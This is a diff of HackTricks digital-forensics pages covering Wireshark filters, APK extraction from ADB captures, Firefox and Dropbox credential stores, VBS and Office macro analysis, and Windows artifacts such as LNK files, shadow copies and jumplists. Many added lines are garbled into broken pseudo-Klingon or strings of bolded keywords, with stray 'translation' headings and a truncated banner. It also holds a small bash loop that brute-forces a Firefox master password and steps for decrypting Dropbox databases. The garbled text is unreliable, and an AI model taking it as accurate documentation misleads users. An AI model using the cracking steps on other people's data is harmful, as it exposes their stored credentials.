@ -4,7 +4,7 @@
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>!HackTricks AWS Red Team Expert</strong></a><strong>!</strong></summary>
Other ways to support HackTricks: Other ways to support HackTricks:
@ -77,11 +77,11 @@ Here you can find wireshark filter depending on the protocol: [https://www.wires
Other interesting filters: Other interesting filters:
* `(http.request or ssl.handshake.type == 1) and !(udp.port eq 1900)` * `(http.request or ssl.handshake.type == 1) and !(udp.port eq 1900)`
* HTTP and initial HTTPS traffic * HTTP and initial HTTPS traffic
* `(http.request or ssl.handshake.type == 1 or tcp.flags eq 0x0002) and !(udp.port eq 1900)` * `(http.request or ssl.handshake.type == 1 or tcp.flags eq 0x0002) and !(udp.port eq 1900)`
* HTTP and initial HTTPS traffic + TCP SYN * HTTP and initial HTTPS traffic + TCP SYN
* `(http.request or ssl.handshake.type == 1 or tcp.flags eq 0x0002 or dns) and !(udp.port eq 1900)` * `(http.request or ssl.handshake.type == 1 or tcp.flags eq 0x0002 or dns) and !(udp.port eq 1900)`
* HTTP and initial HTTPS traffic + TCP SYN + DNS requests * HTTP and initial HTTPS traffic + TCP SYN + DNS requests
### Search ### Search
@ -140,34 +140,32 @@ To import this in wireshark go to \_edit > preference > protocol > ssl > and imp
## ADB communication ## ADB communication
Extract an APK from an ADB communication where the APK was sent: Extract an APK from an ADB communication where the APK was sent:
```python ```python
from scapy.all import * from scapy.all import *
pcap = rdpcap("final2.pcapng") pcap = rdpcap("final2.pcapng")
def rm_data(data): def rm_data(data):
splitted = data.split(b"DATA") splitted = data.split(b"DATA")
if len(splitted) == 1: if len(splitted) == 1:
return data return data
else: else:
return splitted[0]+splitted[1][4:] return splitted[0]+splitted[1][4:]
all_bytes = b"" all_bytes = b""
for pkt in pcap: for pkt in pcap:
if Raw in pkt: if Raw in pkt:
a = pkt[Raw] a = pkt[Raw]
if b"WRTE" == bytes(a)[:4]: if b"WRTE" == bytes(a)[:4]:
all_bytes += rm_data(bytes(a)[24:]) all_bytes += rm_data(bytes(a)[24:])
else: else:
all_bytes += rm_data(bytes(a)) all_bytes += rm_data(bytes(a))
print(all_bytes) print(all_bytes)
f = open('all_bytes.data', 'w+b') f = open('all_bytes.data', 'w+b')
f.write(all_bytes) f.write(all_bytes)
f.close() f.close()
``` ```
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

File diff suppressed because one or more lines are too long

View file

@ -1,16 +1,14 @@
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>qaStaHvIS AWS hacking vItlhutlh</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks: lo'laHbe'chugh HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * vaj **company HackTricks advertise** **download HackTricks PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * **official PEASS & HackTricks swag** [**ghItlh**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * **The PEASS Family** [**ghItlh**](https://opensea.io/collection/the-peass-family), **collection NFTs** [**ghItlh**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** * **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) **telegram group**](https://t.me/peass) **follow** **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) **HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details> </details>
@ -41,16 +39,14 @@ Here you can find interesting tricks for specific file-types and/or software:
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>qaStaHvIS AWS hacking vItlhutlh</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks: lo'laHbe'chugh HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * vaj **company HackTricks advertise** **download HackTricks PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * **official PEASS & HackTricks swag** [**ghItlh**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * **The PEASS Family** [**ghItlh**](https://opensea.io/collection/the-peass-family), **collection NFTs** [**ghItlh**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** * **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) **telegram group**](https://t.me/peass) **follow** **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) **HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details> </details>

View file

@ -55,7 +55,7 @@ A `profiles.ini` file within these directories lists the user profiles. Each pro
Within each profile folder, you can find several important files: Within each profile folder, you can find several important files:
- **places.sqlite**: Stores history, bookmarks, and downloads. Tools like [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing_history_view.html) on Windows can access the history data. - **places.sqlite**: Stores history, bookmarks, and downloads. Tools like [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing_history_view.html) on Windows can access the history data.
- Use specific SQL queries to extract history and downloads information. - Use specific SQL queries to extract history and downloads information.
- **bookmarkbackups**: Contains backups of bookmarks. - **bookmarkbackups**: Contains backups of bookmarks.
- **formhistory.sqlite**: Stores web form data. - **formhistory.sqlite**: Stores web form data.
- **handlers.json**: Manages protocol handlers. - **handlers.json**: Manages protocol handlers.
@ -83,8 +83,8 @@ With the following script and call you can specify a password file to brute forc
#./brute.sh top-passwords.txt 2>/dev/null | grep -A2 -B2 "chrome:" #./brute.sh top-passwords.txt 2>/dev/null | grep -A2 -B2 "chrome:"
passfile=$1 passfile=$1
while read pass; do while read pass; do
echo "Trying $pass" echo "Trying $pass"
echo "$pass" | python firefox_decrypt.py echo "$pass" | python firefox_decrypt.py
done < $passfile done < $passfile
``` ```
{% endcode %} {% endcode %}
@ -192,11 +192,7 @@ Get Access Today:
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><
Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** * **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**

View file

@ -1,8 +1,6 @@
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>qaStaHvIS AWS hacking vaj zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks: Other ways to support HackTricks:
@ -18,55 +16,61 @@ Other ways to support HackTricks:
Some things that could be useful to debug/deobfuscate a malicious VBS file: Some things that could be useful to debug/deobfuscate a malicious VBS file:
## echo ## echo
```bash ```bash
Wscript.Echo "Like this?" Wscript.Echo "Like this?"
``` ```
## Comments
## Commnets ### tlhIngan Hol
## Qapla'! Qapla'!
### tlhIngan Hol
## Qapla'! Qapla'!
```bash ```bash
' this is a comment ' this is a comment
``` ```
## Test ## Test
```bash ```bash
cscript.exe file.vbs cscript.exe file.vbs
``` ```
## Write data to a file ## Write data to a file
## tlhIngan Hol translation:
## Datuv vItlhutlh
## HTML translation:
## <h2>Datuv vItlhutlh</h2>
```js ```js
Function writeBinary(strBinary, strPath) Function writeBinary(strBinary, strPath)
Dim oFSO: Set oFSO = CreateObject("Scripting.FileSystemObject") Dim oFSO: Set oFSO = CreateObject("Scripting.FileSystemObject")
' below lines purpose: checks that write access is possible! ' below lines purpose: checks that write access is possible!
Dim oTxtStream Dim oTxtStream
On Error Resume Next On Error Resume Next
Set oTxtStream = oFSO.createTextFile(strPath) Set oTxtStream = oFSO.createTextFile(strPath)
If Err.number <> 0 Then MsgBox(Err.message) : Exit Function If Err.number <> 0 Then MsgBox(Err.message) : Exit Function
On Error GoTo 0 On Error GoTo 0
Set oTxtStream = Nothing Set oTxtStream = Nothing
' end check of write access ' end check of write access
With oFSO.createTextFile(strPath) With oFSO.createTextFile(strPath)
.Write(strBinary) .Write(strBinary)
.Close .Close
End With End With
End Function End Function
``` ```
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>qaStaHvIS AWS hacking vItlhutlh</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks: Other ways to support HackTricks:
@ -77,5 +81,3 @@ Other ways to support HackTricks:
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details> </details>

View file

@ -2,7 +2,7 @@
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>!HackTricks</strong></a><strong>!</strong></summary>
Other ways to support HackTricks: Other ways to support HackTricks:
@ -87,12 +87,10 @@ Then you can use the tool [**DataProtectionDecryptor**](https://nirsoft.net/util
If everything goes as expected, the tool will indicate the **primary key** that you need to **use to recover the original one**. To recover the original one, just use this [cyber\_chef receipt](https://gchq.github.io/CyberChef/#recipe=Derive\_PBKDF2\_key\(%7B'option':'Hex','string':'98FD6A76ECB87DE8DAB4623123402167'%7D,128,1066,'SHA1',%7B'option':'Hex','string':'0D638C092E8B82FC452883F95F355B8E'%7D\)) putting the primary key as the "passphrase" inside the receipt. If everything goes as expected, the tool will indicate the **primary key** that you need to **use to recover the original one**. To recover the original one, just use this [cyber\_chef receipt](https://gchq.github.io/CyberChef/#recipe=Derive\_PBKDF2\_key\(%7B'option':'Hex','string':'98FD6A76ECB87DE8DAB4623123402167'%7D,128,1066,'SHA1',%7B'option':'Hex','string':'0D638C092E8B82FC452883F95F355B8E'%7D\)) putting the primary key as the "passphrase" inside the receipt.
The resulting hex is the final key used to encrypt the databases which can be decrypted with: The resulting hex is the final key used to encrypt the databases which can be decrypted with:
```bash ```bash
sqlite -k <Obtained Key> config.dbx ".backup config.db" #This decompress the config.dbx and creates a clear text backup in config.db sqlite -k <Obtained Key> config.dbx ".backup config.db" #This decompress the config.dbx and creates a clear text backup in config.db
``` ```
**`config.dbx`** database contains:
The **`config.dbx`** database contains:
* **Email**: The email of the user * **Email**: The email of the user
* **usernamedisplayname**: The name of the user * **usernamedisplayname**: The name of the user
@ -100,7 +98,7 @@ The **`config.dbx`** database contains:
* **Host\_id: Hash** used to authenticate to the cloud. This can only be revoked from the web. * **Host\_id: Hash** used to authenticate to the cloud. This can only be revoked from the web.
* **Root\_ns**: User identifier * **Root\_ns**: User identifier
The **`filecache.db`** database contains information about all the files and folders synchronized with Dropbox. The table `File_journal` is the one with more useful information: **`filecache.db`** database contains information about all the files and folders synchronized with Dropbox. The table `File_journal` is the one with more useful information:
* **Server\_path**: Path where the file is located inside the server (this path is preceded by the `host_id` of the client). * **Server\_path**: Path where the file is located inside the server (this path is preceded by the `host_id` of the client).
* **local\_sjid**: Version of the file * **local\_sjid**: Version of the file

View file

@ -33,17 +33,14 @@ To explore OOXML file structures, the command to unzip a document and the output
For analysis, **oletools** and **OfficeDissector** offer comprehensive toolsets for examining both OLE and OOXML documents. These tools help in identifying and analyzing embedded macros, which often serve as vectors for malware delivery, typically downloading and executing additional malicious payloads. Analysis of VBA macros can be conducted without Microsoft Office by utilizing Libre Office, which allows for debugging with breakpoints and watch variables. For analysis, **oletools** and **OfficeDissector** offer comprehensive toolsets for examining both OLE and OOXML documents. These tools help in identifying and analyzing embedded macros, which often serve as vectors for malware delivery, typically downloading and executing additional malicious payloads. Analysis of VBA macros can be conducted without Microsoft Office by utilizing Libre Office, which allows for debugging with breakpoints and watch variables.
Installation and usage of **oletools** are straightforward, with commands provided for installing via pip and extracting macros from documents. Automatic execution of macros is triggered by functions like `AutoOpen`, `AutoExec`, or `Document_Open`. Installation and usage of **oletools** are straightforward, with commands provided for installing via pip and extracting macros from documents. Automatic execution of macros is triggered by functions like `AutoOpen`, `AutoExec`, or `Document_Open`.
```bash ```bash
sudo pip3 install -U oletools sudo pip3 install -U oletools
olevba -c /path/to/document #Extract macros olevba -c /path/to/document #Extract macros
``` ```
<figure><img src="../../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src="../../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\ \
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) **vIghoS** **automate workflows** **Duj** **most advanced** community tools.\
Get Access Today: Get Access Today:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

View file

@ -1,5 +1,3 @@
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
@ -33,5 +31,3 @@ Other ways to support HackTricks:
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details> </details>

View file

@ -1,5 +1,3 @@
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
@ -41,5 +39,3 @@ Other ways to support HackTricks:
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details> </details>

View file

@ -2,15 +2,15 @@
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>qa'vIn AWS hacking jatlhlaH</strong></a><strong>!</strong></summary>
Other ways to support HackTricks: HackTricks poH:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * **HackTricks advertisement** **company advertise** **want** **pdf HackTricks download** **SUBSCRIPTION PLANS** [**Check**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Get**
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * [**The PEASS Family**](https://opensea.io/collection/the-peass-family) **Discover**, [**NFTs**](https://opensea.io/collection/the-peass-family) **collection** **exclusive** **our**
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** * 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) **Join** or [**telegram group**](https://t.me/peass) **or** **follow** **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. * **hacking tricks** **your** **Share** **submitting PRs** [**HackTricks**](https://github.com/carlospolop/hacktricks) **and** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github repos**.
</details> </details>
@ -31,14 +31,14 @@ It's crucial to note that password-protected zip files **do not encrypt filename
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>qa'vIn AWS hacking jatlhlaH</strong></a><strong>!</strong></summary>
Other ways to support HackTricks: HackTricks poH:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * **HackTricks advertisement** **company advertise** **want** **pdf HackTricks download** **SUBSCRIPTION PLANS** [**Check**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Get**
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * [**The PEASS Family**](https://opensea.io/collection/the-peass-family) **Discover**, [**NFTs**](https://opensea.io/collection/the-peass-family) **collection** **exclusive** **our**
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** * 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) **Join** or [**telegram group**](https://t.me/peass) **or** **follow** **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. * **hacking tricks** **your** **Share** **submitting PRs** [**HackTricks**](https://github.com/carlospolop/hacktricks) **and** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github repos**.
</details> </details>

View file

@ -47,80 +47,72 @@ When a file is deleted in this folder 2 specific files are created:
![](<../../../.gitbook/assets/image (486).png>) ![](<../../../.gitbook/assets/image (486).png>)
Having these files you can use the tool [**Rifiuti**](https://github.com/abelcheung/rifiuti2) to get the original address of the deleted files and the date it was deleted (use `rifiuti-vista.exe` for Vista Win10). Having these files you can use the tool [**Rifiuti**](https://github.com/abelcheung/rifiuti2) to get the original address of the deleted files and the date it was deleted (use `rifiuti-vista.exe` for Vista Win10).
``` ```
.\rifiuti-vista.exe C:\Users\student\Desktop\Recycle .\rifiuti-vista.exe C:\Users\student\Desktop\Recycle
``` ```
![](<../../../.gitbook/assets/image (495) (1) (1) (1).png>) ![](<../../../.gitbook/assets/image (495) (1) (1) (1).png>)
### Volume Shadow Copies ### tlhIngan Hol
Shadow Copy is a technology included in Microsoft Windows that can create **backup copies** or snapshots of computer files or volumes, even when they are in use. Shadow Copy Microsoft Windows Daq **backup copies** qorDu'vo' 'ej **snapshots** cha'loghDaq, 'ach 'oH vaj **volumes** Daq, 'ach 'oH **in use**.
These backups are usually located in the `\System Volume Information` from the root of the file system and the name is composed of **UIDs** shown in the following image: **UIDs** **image** vItlhutlh:
![](<../../../.gitbook/assets/image (520).png>) ![](<../../../.gitbook/assets/image (520).png>)
Mounting the forensics image with the **ArsenalImageMounter**, the tool [**ShadowCopyView**](https://www.nirsoft.net/utils/shadow\_copy\_view.html) can be used to inspect a shadow copy and even **extract the files** from the shadow copy backups. **ArsenalImageMounter** **forensics image** **mount** Daq, **ShadowCopyView** [**tool**](https://www.nirsoft.net/utils/shadow\_copy\_view.html) **inspect** **shadow copy** **extract the files** **shadow copy backups**.
![](<../../../.gitbook/assets/image (521).png>) ![](<../../../.gitbook/assets/image (521).png>)
The registry entry `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\BackupRestore` contains the files and keys **to not backup**: `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\BackupRestore` **registry entry** **files** **keys** **backup** **contain**:
![](<../../../.gitbook/assets/image (522).png>) ![](<../../../.gitbook/assets/image (522).png>)
The registry `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS` also contains configuration information about the `Volume Shadow Copies`. `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS` **registry** **configuration information** **Volume Shadow Copies**.
### Office AutoSaved Files ### Office AutoSaved Files
You can find the office autosaved files in: `C:\Usuarios\\AppData\Roaming\Microsoft{Excel|Word|Powerpoint}\` `C:\Usuarios\\AppData\Roaming\Microsoft{Excel|Word|Powerpoint}\` **office autosaved files** **find**.
## Shell Items ## Shell Items
A shell item is an item that contains information about how to access another file. **shell item** **item** **information** **access another file**.
### Recent Documents (LNK) ### Recent Documents (LNK)
Windows **automatically** **creates** these **shortcuts** when the user **open, uses or creates a file** in: Windows **automatically** **creates** **shortcuts** **user** **open, uses or creates a file** **in**:
* Win7-Win10: `C:\Users\\AppData\Roaming\Microsoft\Windows\Recent\` * Win7-Win10: `C:\Users\\AppData\Roaming\Microsoft\Windows\Recent\`
* Office: `C:\Users\\AppData\Roaming\Microsoft\Office\Recent\` * Office: `C:\Users\\AppData\Roaming\Microsoft\Office\Recent\`
When a folder is created, a link to the folder, to the parent folder, and the grandparent folder is also created. **folder** **created**, **link** **folder**, **parent folder**, **grandparent folder** **created**.
These automatically created link files **contain information about the origin** like if it's a **file** **or** a **folder**, **MAC** **times** of that file, **volume information** of where is the file stored and **folder of the target file**. This information can be useful to recover those files in case they were removed. **automatically created link files** **contain information about the origin** **file** **folder**, **MAC** **times** **file**, **volume information** **file stored** **folder** **target file**. **information** **useful** **recover** **files** **case** **removed**.
Also, the **date created of the link** file is the first **time** the original file was **first** **used** and the **date** **modified** of the link file is the **last** **time** the origin file was used. **date created of the link** **file** **first** **time** **original file** **first** **used** **date** **modified** **link file** **last** **time** **origin file** **used**.
To inspect these files you can use [**LinkParser**](http://4discovery.com/our-tools/). [**LinkParser**](http://4discovery.com/our-tools/) **inspect** **files**.
In this tools you will find **2 sets** of timestamps: **2 sets** **timestamps** **find**:
* **First Set:** * **First Set:**
1. FileModifiedDate 1. FileModifiedDate
2. FileAccessDate 2. FileAccessDate
3. FileCreationDate 3. FileCreationDate
* **Second Set:** * **Second Set:**
1. LinkModifiedDate 1. LinkModifiedDate
2. LinkAccessDate 2. LinkAccessDate
3. LinkCreationDate. 3. LinkCreationDate.
The first set of timestamp references the **timestamps of the file itself**. The second set references the **timestamps of the linked file**. **first set** **timestamp** **file itself**. **second set** **timestamps** **linked file**.
You can get the same information running the Windows CLI tool: [**LECmd.exe**](https://github.com/EricZimmerman/LECmd)
**same information** **Windows CLI tool** [**LECmd.exe**](https://github.com/EricZimmerman/LECmd) **running**.
``` ```
LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs
``` ```
In this case, the information is going to be saved inside a CSV file.
### Jumplists ### Jumplists
These are the recent files that are indicated per application. It's the list of **recent files used by an application** that you can access on each application. They can be created **automatically or be custom**. **jumplists** created automatically are stored in `C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\`. The jumplists are named following the format `{id}.autmaticDestinations-ms` where the initial ID is the ID of the application.
The **jumplists** created automatically are stored in `C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\`. The jumplists are named following the format `{id}.autmaticDestinations-ms` where the initial ID is the ID of the application.
The custom jumplists are stored in `C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\CustomDestination\` and they are created by the application usually because something **important** has happened with the file (maybe marked as favorite) The custom jumplists are stored in `C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\CustomDestination\` and they are created by the application usually because something **important** has happened with the file (maybe marked as favorite)
@ -128,10 +120,6 @@ The **created time** of any jumplist indicates the **the first time the file was
You can inspect the jumplists using [**JumplistExplorer**](https://ericzimmerman.github.io/#!index.md). You can inspect the jumplists using [**JumplistExplorer**](https://ericzimmerman.github.io/#!index.md).
![](<../../../.gitbook/assets/image (474).png>)
(_Note that the timestamps provided by JumplistExplorer are related to the jumplist file itself_)
### Shellbags ### Shellbags
[**Follow this link to learn what are the shellbags.**](interesting-windows-registry-keys.md#shellbags) [**Follow this link to learn what are the shellbags.**](interesting-windows-registry-keys.md#shellbags)
@ -146,8 +134,6 @@ It's possible to identify that a USB device was used thanks to the creation of:
Note that some LNK file instead of pointing to the original path, points to the WPDNSE folder: Note that some LNK file instead of pointing to the original path, points to the WPDNSE folder:
![](<../../../.gitbook/assets/image (476).png>)
The files in the folder WPDNSE are a copy of the original ones, then won't survive a restart of the PC and the GUID is taken from a shellbag. The files in the folder WPDNSE are a copy of the original ones, then won't survive a restart of the PC and the GUID is taken from a shellbag.
### Registry Information ### Registry Information
@ -158,14 +144,10 @@ The files in the folder WPDNSE are a copy of the original ones, then won't survi
